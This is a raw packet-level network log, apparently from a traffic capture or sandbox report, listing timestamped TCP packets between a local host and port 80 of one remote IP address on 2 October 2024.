                                                                                                            Oct 2, 2024 08:54:59.407511950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407527924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407546043 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407555103 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407555103 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407562017 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407578945 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407613993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407613993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408410072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408427000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408442020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408457041 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408473015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408488035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408497095 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408497095 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408503056 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408564091 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409307957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409324884 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409339905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409354925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409370899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409374952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409374952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409385920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409485102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410201073 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410218000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410233021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410248995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410264015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410279989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410280943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410280943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410296917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410342932 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410342932 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411102057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411118031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411133051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411149025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411164045 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411179066 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411185026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411185026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411194086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774733067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774743080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774766922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774777889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774789095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774796009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774805069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774807930 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774816990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774827003 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774837971 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774861097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774861097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775620937 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775631905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775641918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775651932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775661945 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775672913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775681973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775681973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775682926 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775695086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775706053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775719881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775719881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775754929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776518106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776530981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776540995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776551008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776561022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776571035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776596069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776617050 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776645899 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777426004 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777442932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777452946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777462959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777472973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777482033 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777484894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777496099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777506113 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777517080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777528048 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777528048 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777543068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777585030 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778306007 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778316975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778327942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778337955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778348923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778367043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778367043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778376102 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778388023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778398037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778409004 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778413057 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778424978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778467894 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779225111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779237032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779247999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779258966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779268980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779280901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779292107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779301882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779326916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779377937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779377937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780097961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780109882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780122042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780133009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780142069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780158043 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780169964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780179024 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780179977 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780180931 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780193090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780199051 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780209064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780246973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780246973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780999899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781013012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781024933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781035900 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781068087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781078100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781078100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781079054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781091928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781105042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781114101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781116962 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781141043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781641960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781653881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781668901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781676054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781682968 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781688929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781694889 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781733036 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781733036 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782186031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782197952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782210112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782221079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782232046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782243967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782253981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782262087 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782262087 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782265902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782279015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782289028 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782299042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782310009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782330990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782350063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782371044 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783165932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783178091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783186913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783198118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783209085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783220053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783231974 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783233881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783233881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783260107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783269882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783281088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783292055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783301115 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783301115 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783303022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783314943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783315897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783329010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783368111 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783368111 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784161091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784168959 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784189939 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794635057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794644117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794645071 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794655085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794697046 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794697046 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794826031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794836044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794845104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794861078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794871092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794879913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794891119 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794899940 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794904947 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794904947 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794912100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794923067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794934034 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794939995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794939995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794945002 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794958115 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794967890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794981956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794981956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.795250893 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796087027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796097994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796106100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796116114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796125889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796137094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796148062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796154022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796154022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796159029 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796169996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796180010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796190977 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796192884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796192884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796201944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796222925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796231985 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796235085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796246052 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796284914 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796406031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796940088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796948910 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797123909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797133923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797142982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797152996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797158957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797158957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797163963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797203064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797203064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797404051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797429085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797480106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797491074 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797501087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797511101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797522068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797523022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797523975 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797671080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797681093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797689915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797699928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797702074 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797702074 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797709942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797720909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797730923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798173904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798209906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798209906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798382998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798393965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798402071 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798410892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798420906 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798430920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798430920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798441887 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798454046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798459053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798470974 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798515081 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.801609993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.828648090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828692913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828702927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828849077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828859091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828891993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.828891993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.829000950 CEST8049702147.45.44.104192.168.2.7
